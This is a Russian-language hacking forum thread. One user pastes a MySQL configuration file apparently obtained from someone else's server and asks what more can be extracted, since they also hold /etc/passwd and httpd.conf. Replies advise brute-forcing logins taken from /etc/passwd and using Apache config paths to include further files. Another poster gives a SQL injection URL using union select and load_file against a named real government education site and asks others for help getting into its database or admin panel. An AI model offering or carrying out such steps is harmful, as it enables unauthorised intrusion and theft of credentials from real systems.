ANTICHAT — форум по информационной безопасности, OSINT и технологиям

1.my.cnf -

# Example mysql config file for large systems. # # This is for large system with memory = 512M where the system runs mainly # MySQL. # # You can copy this file to # /etc/my.cnf to set global options, # mysql-data-dir/my.cnf to set server-specific options (in this # installation this directory is /usr/local/mysql/data) or # ~/.my.cnf to set user-specific options. # # One can in this file use all long options that the program supports. # If you want to know which options a program support, run the program # with --help option. # The following options will be passed to all MySQL clients [client] #password = your_password port = 3306 socket = /var/lib/mysql/mysql.sock ###default-character-set=utf8 # Here follows entries for some specific programs [server] ###init-connect="SET NAMES cp1251" ###skip-character-set-client-handshake ###default-character-set=utf8 # The MySQL server [mysqld] ###default-character-set=utf8 ###character-set-server=utf8 ###collation-server=utf8_general_ci ###init-connect="SET NAMES cp1251" ###skip-character-set-client-handshake datadir=/home/mysql4.data port = 3306 socket = /var/lib/mysql/mysql.sock #log = /usr/local/mysql/data/mysqld.log ###default-character-set = cp1251 skip-locking log_slow_queries = /home/mysql4.data/slow_sql.log long_query_time = 10 join_buffer_size=1M interactive_timeout=60 max_connections=300 max_user_connections=15 key_buffer=512M max_allowed_packet = 2M table_cache = 1024 sort_buffer_size = 2M record_buffer=2M thread_cache=8 connect_timeout=10 max_tmp_tables=64 myisam_sort_buffer_size=256M read_buffer_size = 1M query_cache_size= 16M # Try number of CPU's*2 for thread_concurrency thread_concurrency = 4 # Don't listen on a TCP/IP port at all. This can be a security enhancement, # if all processes that need to connect to mysqld run on the same host. # All interaction with mysqld must be made via Unix sockets or named pipes. # Note that using this option without enabling named pipes on Windows # (via the "enable-named-pipe" option) will render mysqld useless! # # Replication Master Server (default) # binary logging is required for replication #log-bin # required unique id between 1 and 2^32 - 1 # defaults to 1 if master-host is not set # but will not function as a master if omitted server-id = 1 # Replication Slave (comment out master section to use this) # # To configure this host as a replication slave, you can choose between # two methods : # # 1) Use the CHANGE MASTER TO command (fully described in our manual) - # the syntax is: # # CHANGE MASTER TO MASTER_HOST=, MASTER_PORT=, # MASTER_USER=, MASTER_PASSWORD= ; # # where you replace , , by quoted strings and # by the master's port number (3306 by default). # # Example: # # CHANGE MASTER TO MASTER_HOST='125.564.12.1', MASTER_PORT=3306, # MASTER_USER='joe', MASTER_PASSWORD='secret'; # # OR # # 2) Set the variables below. However, in case you choose this method, then # start replication for the first time (even unsuccessfully, for example # if you mistyped the password in master-password and the slave fails to # connect), the slave will create a master.info file, and any later # change in this file to the variables' values below will be ignored and # overridden by the content of the master.info file, unless you shutdown # the slave server, delete master.info and restart the slaver server. # For that reason, you may want to leave the lines below untouched # (commented) and instead use CHANGE MASTER TO (see above) # # required unique id between 2 and 2^32 - 1 # (and different from the master) # defaults to 2 if master-host is set # but will not function as a slave if omitted #server-id = 2 # # The replication master for this slave - required #master-host = # # The username the slave will use for authentication when connecting # to the master - required #master-user = # # The password the slave will authenticate with when connecting to # the master - required #master-password = # # The port the master is listening on. # optional - defaults to 3306 #master-port = # # binary logging - not required for slaves, but recommended #log-bin # Point the following paths to different dedicated disks #tmpdir = /tmp/ #log-update = /path-to-dedicated-directory/hostname # Uncomment the following if you are using BDB tables #bdb_cache_size = 64M #bdb_max_lock = 100000 # Uncomment the following if you are using InnoDB tables #innodb_data_home_dir = /usr/local/mysql/data/ #innodb_data_file_path = ibdata1:10M:autoextend #innodb_log_group_home_dir = /usr/local/mysql/data/ #innodb_log_arch_dir = /usr/local/mysql/data/ # You can set .._buffer_pool_size up to 50 - 80 % # of RAM but beware of setting memory usage too high #innodb_buffer_pool_size = 256M #innodb_additional_mem_pool_size = 20M # Set .._log_file_size to 25 % of buffer pool size #innodb_log_file_size = 64M #innodb_log_buffer_size = 8M #innodb_flush_log_at_trx_commit = 1 #innodb_lock_wait_timeout = 50 [mysqldump] quick max_allowed_packet = 16M [mysql] no-auto-rehash # Remove the next comment character if you are not familiar with SQL #safe-updates [isamchk] key_buffer = 128M sort_buffer_size = 128M read_buffer = 2M write_buffer = 2M [myisamchk] key_buffer = 128M sort_buffer_size = 128M read_buffer = 2M write_buffer = 2M [mysqlhotcopy] interactive-timeout

Так же есть etc/passwd и httpd.cond.Сколько ни пыталсо,вручную все не перебрал(руки отвалились:ДД,ибо инклудера нету работающего).Что можно выудить из всей этой информации ? Логина и пароля тут нету =_=.phpinfo кстати тож имеецо,но от него толку мало).Что должно быть в httpd.conf ? В системе такой фаил один?.

ЗЫ: прошу прощения за флуд,но в один пост всё не накатаешь...

Уже ни в чём,лови плюсики )))

Велемир, из etc/passwd можешь вытащить логины и брутить их Из конфигов апача можно получить полный путь и попытаца найти конфиг и проинклюдить его.

А вот я не знаю где он там... =__________=

Велемир, не знаешь где конфиг или где этот путь в конфиге?

Где путьв конфиге конкретно.Там идёт сплошной текст хрен разобрать =_=

нужно название табличек и столбцов в FastBB кто поможет

http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,3,load_file(configuration.php), 5,6+from+jos_users.users--

Denied блин
Может кто уже был на етом сайте и знает как в БД попасть или хотя бы в админку?